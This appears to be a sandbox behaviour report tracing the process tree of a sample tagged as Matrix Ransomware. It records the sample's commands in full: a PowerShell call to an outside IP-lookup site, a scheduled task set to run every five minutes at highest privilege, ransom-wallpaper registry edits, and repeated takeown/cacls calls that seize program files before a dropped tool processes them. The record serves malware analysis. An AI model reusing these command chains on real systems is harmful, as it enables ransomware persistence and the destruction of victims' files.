PID 1288 wrote to memory of 1628	1288	wscript.exe	cmd.exe
PID 1628 wrote to memory of 828	1628	cmd.exe	schtasks.exe
PID 1628 wrote to memory of 828	1628	cmd.exe	schtasks.exe
PID 1628 wrote to memory of 828	1628	cmd.exe	schtasks.exe
PID 1628 wrote to memory of 828	1628	cmd.exe	schtasks.exe
PID 1288 wrote to memory of 1072	1288	wscript.exe	cmd.exe
PID 1288 wrote to memory of 1072	1288	wscript.exe	cmd.exe
PID 1288 wrote to memory of 1072	1288	wscript.exe	cmd.exe
PID 1288 wrote to memory of 1072	1288	wscript.exe	cmd.exe
PID 1072 wrote to memory of 468	1072	cmd.exe	schtasks.exe
PID 1072 wrote to memory of 468	1072	cmd.exe	schtasks.exe
PID 1072 wrote to memory of 468	1072	cmd.exe	schtasks.exe
PID 1072 wrote to memory of 468	1072	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
"C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1404
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe" "C:\Users\Admin\AppData\Local\Temp\NWD6oM0v.exe"
  2⤵
  PID:1296
- C:\Users\Admin\AppData\Local\Temp\NWD6oM0v.exe
  "C:\Users\Admin\AppData\Local\Temp\NWD6oM0v.exe" -n
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:568
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\Hl4DdTqh.txt"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:556
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1176
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\zRNdUoa6.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\UjEIYv0E.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1156
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\UjEIYv0E.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2016
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:1540
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\a3EtSyND.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1572
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\a3EtSyND.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1288
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\1kVkNVj4.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1628
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\1kVkNVj4.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:828
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1072
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    PID:936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1552
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1264
    - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv64.exe
        
        XK0Utxzv.exe -accepteula "ENUtxt.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Sets service image path in registry
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  - Loads dropped DLL
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    - Loads dropped DLL
    PID:300
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:340
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1792
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:792
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2016
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1540
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1352
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1956
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1720
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1284
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:364
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:336
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:936
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1720
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1484
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:300
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""
  2⤵
  - Loads dropped DLL
  PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C
    3⤵
    PID:568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Month_Calendar.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2040
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Month_Calendar.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1712
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1900
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:664
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1152
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:336
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:564
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1608
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
  2⤵
  - Loads dropped DLL
  PID:1152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
    3⤵
    PID:300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "AcroSign.prc" -nobanner
    3⤵
    - Loads dropped DLL
    PID:364
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "AcroSign.prc" -nobanner
      4⤵
      Executes dropped EXE
      PID:1412
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  - Loads dropped DLL
  PID:596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    PID:784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1480
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "forms_distributed.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1628
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
  2⤵
  - Loads dropped DLL
  PID:616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
    3⤵
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "reviews_sent.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1304
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "reviews_sent.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:568
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""
  2⤵
  - Loads dropped DLL
  PID:996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "stop_collection_data.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1152
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "stop_collection_data.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1156
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  - Loads dropped DLL
  PID:852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Identity-H" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1844
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Identity-H" -nobanner
      4⤵
      Executes dropped EXE
      PID:596
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  2⤵
  - Loads dropped DLL
  PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "MinionPro-Regular.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "MinionPro-Regular.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1176
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  - Loads dropped DLL
  PID:1284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    - Loads dropped DLL
    PID:336
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      Executes dropped EXE
      PID:364
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:340
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  - Loads dropped DLL
  PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "brt32.clx" -nobanner
    3⤵
    - Loads dropped DLL
    PID:684
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "brt32.clx" -nobanner
      4⤵
      Executes dropped EXE
      PID:1628
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  - Loads dropped DLL
  PID:796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
    - Modifies file permissions
    PID:876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "usa.fca" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2040
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "usa.fca" -nobanner
      4⤵
      Executes dropped EXE
      PID:1560
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2004
